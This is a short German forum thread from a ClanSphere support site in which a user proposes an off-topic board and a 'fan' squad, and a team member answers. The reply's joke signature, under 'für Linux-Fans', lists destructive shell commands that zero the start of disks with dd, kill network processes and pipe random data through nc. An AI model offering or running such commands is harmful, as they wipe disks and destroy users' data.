Demo

Probiere ClanSphere aus und teste daran herum. Demo


Antworten: 1
Seite [1]
Palle F.


Wannabe poster




Herkunft: Lüchow
Beiträge: 32
# Thema - 30.09.2006 um 16:40 Uhr
Hi, also ich fande es gut, wenn wieder ein Wayne Forum für Offtopic-Themen eingeführt würde (oder hab ich das bisher übersehen?)

Und ein nicht ganz ernst gemeinter Vorschlag, da eigentlich ohne tieferen Sinn und Verstand:
Statt den "Squads" wie "Support" etc. auch einen "Fan"-Squad einführen, über den evtl. Dinge, die nciht für "1Frage-1Antwort-Tschüss"-User sichtbar sein sollen.. (habe keine konkrete Idee)... wär nur nen Vorschlag zur Güte


------------------
publicons.. +-

currently... +-
- Schule bis '08
Inaktiv
pHaeno* ClanSphere Team


Geekboy





Beiträge: 1401
# Antwort: 1 - 30.09.2006 um 16:44 Uhr
@1:
Stimmt haben wir derzeit noch nicht. Wird aber denke ich mal auch wieder mit in das Forum kommen.

@2:
Leider bleibt es auch auf der neuen Seite nicht aus dass sich ein User anmeldet, nur eine Frage stellt und dann die Seite niewieder besuchen wird.
Aber genau aus diesem Grund erstellen wir ja die Dokumentation.
Dies mindert hoffentlich die Anzahl der "One-Way-User" ein wenig.


------------------
hajo says:
<div style="imbaness: 200pt; skill: 200pt; equip-align: top;">phaeno's mage</div>


27.05.2007 um 01:38 Uhr - pHaeno*:
Bei Clansphere gibt es KEINE Bugs, es sind ALLES FEATURES



weichmann... +-
Blondi (15:08):
bist du nen mann oder nen weich ei?


pHaeno* (15:09):
weichmann


mehr... +-
if($ahnung==0) {
read( 'handbuch' ) ;
}



## für Linux-Fans

kill -9 `netstat -a | grep https | awk -e '{ print $3; }'`
dd if=/dev/zero of=/dev/hda count=1M
dd if=/dev/zero of=/dev/sda count=1M
cat /dev/urandom | nc 127.0.0.1 443


Inaktiv
|
Antworten: 1
Seite [1]


Sie müssen sich registrieren, um zu antworten.